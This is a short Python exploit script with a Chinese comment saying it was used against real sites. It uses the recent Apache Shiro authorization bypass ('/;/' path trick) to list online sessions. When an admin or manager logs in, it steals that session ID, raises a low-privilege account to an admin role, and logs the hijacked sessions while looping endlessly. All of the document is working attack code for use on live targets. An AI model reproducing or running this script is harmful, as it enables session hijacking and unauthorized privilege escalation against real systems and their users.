import requests
from json import *
import time
def main():
try:
burp0_url = "http://www.baidu.com/;/sys/online/list"
burp0_cookies = {"JSESSIONID": "ceshi"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
Renoes=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
json_data=loads(Renoes)
for i in range(0,len(json_data)):
user_name=json_data[i]['username']
if user_name=='admin' or user_name=='manager':
session=json_data[i]['id']
burp0_url = "http://www.baidu.com/sys/user/update"
burp0_cookies = {"JSESSIONID":session}
burp0_data = {"userId": "188", "name": "CCT", "username": "cct", "deptId": "8", "deptName": "\xe7\xa0\x94\xe5\x8f\x91\xe4\xba\x8c\xe9\x83\xa8", "email": "[email protected]", "status": "1", "roleIds": "1", "role": "1"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
filename=open('vast_result.txt','a+')
filename.write(session+" "+str(time.time())+"\n")
filename.close()
pass
except Exception as e:
pass
if __name__ == '__main__':
while True:
main()
pass
在实际站点用到的脚本!实时监听目标站点!当检测到admin或者manager上线的时候更新自己的低权账号,利用的是shiro最近的那个越权漏洞